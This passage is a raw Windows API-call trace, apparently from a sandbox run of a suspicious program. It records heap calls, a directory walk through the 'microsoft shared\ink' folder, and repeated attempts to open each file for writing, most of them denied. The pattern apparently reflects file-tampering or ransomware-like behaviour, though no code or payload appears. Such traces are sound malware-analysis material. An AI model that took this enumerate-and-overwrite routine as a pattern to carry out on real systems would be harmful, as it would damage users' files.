[0083.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0083.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0083.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.084] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.084] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.084] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.084] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.085] AreFileApisANSI () returned 1 [0083.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0083.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0083.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.085] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0083.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.085] AreFileApisANSI () returned 1 [0083.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0083.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x856c0 [0083.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui") returned 73 [0083.085] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.086] GetFileType (hFile=0x42c) returned 0x1 [0083.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0083.086] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.086] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.086] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.087] CloseHandle (hObject=0x42c) returned 1 [0083.087] AreFileApisANSI () returned 1 [0083.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0083.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x858a0 [0083.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x858a0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui") returned 73 [0083.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.087] GetLastError () returned 0x5 [0083.087] GetLastError () returned 0x5 [0083.087] SetLastError (dwErrCode=0x5) [0083.087] GetLastError () returned 0x5 [0083.087] SetLastError (dwErrCode=0x5) [0083.087] GetLastError () returned 0x5 [0083.087] SetLastError (dwErrCode=0x5) [0083.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x858a0 | out: hHeap=0x20000) returned 1 [0083.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0083.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.087] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓Ⰰ")) returned 0 [0083.087] FindClose (in: hFindFile=0x785d0 | out: hFindFile=0x785d0) returned 1 [0083.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0083.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0083.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0083.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0083.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0083.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.088] AreFileApisANSI () returned 1 [0083.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions", lpUsedDefaultChar=0x0) returned 65 [0083.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0083.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.089] AreFileApisANSI () returned 1 [0083.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0083.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82208 [0083.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 65 [0083.089] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.089] GetLastError () returned 0x5 [0083.089] GetLastError () returned 0x5 [0083.089] SetLastError (dwErrCode=0x5) [0083.089] GetLastError () returned 0x5 [0083.089] SetLastError (dwErrCode=0x5) [0083.089] GetLastError () returned 0x5 [0083.089] SetLastError (dwErrCode=0x5) [0083.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0083.089] AreFileApisANSI () returned 1 [0083.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0083.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82958 [0083.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x82958, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 65 [0083.090] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.090] GetLastError () returned 0x5 [0083.090] GetLastError () returned 0x5 [0083.090] SetLastError (dwErrCode=0x5) [0083.090] GetLastError () returned 0x5 [0083.090] SetLastError (dwErrCode=0x5) [0083.090] GetLastError () returned 0x5 [0083.090] SetLastError (dwErrCode=0x5) [0083.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82958 | out: hHeap=0x20000) returned 1 [0083.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0083.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0083.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0083.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0083.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0083.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0083.090] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf9a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="he-IL", cAlternateFileName="")) returned 1 [0083.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0083.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0083.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0083.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0083.090] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x780d0 [0083.092] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0637839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.092] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0638633, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxpad", cAlternateFileName="")) returned 1 [0083.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0083.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0083.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0083.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0083.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0083.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8afe0 [0083.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0083.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0083.092] AreFileApisANSI () returned 1 [0083.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad", lpUsedDefaultChar=0x0) returned 72 [0083.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0083.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.093] AreFileApisANSI () returned 1 [0083.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0083.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0083.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad") returned 72 [0083.093] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.093] GetLastError () returned 0x5 [0083.093] GetLastError () returned 0x5 [0083.093] SetLastError (dwErrCode=0x5) [0083.093] GetLastError () returned 0x5 [0083.093] SetLastError (dwErrCode=0x5) [0083.093] GetLastError () returned 0x5 [0083.093] SetLastError (dwErrCode=0x5) [0083.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0083.093] AreFileApisANSI () returned 1 [0083.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0083.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0083.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad") returned 72 [0083.094] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.094] GetLastError () returned 0x5 [0083.094] GetLastError () returned 0x5 [0083.094] SetLastError (dwErrCode=0x5) [0083.094] GetLastError () returned 0x5 [0083.094] SetLastError (dwErrCode=0x5) [0083.094] GetLastError () returned 0x5 [0083.094] SetLastError (dwErrCode=0x5) [0083.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0083.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0083.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) 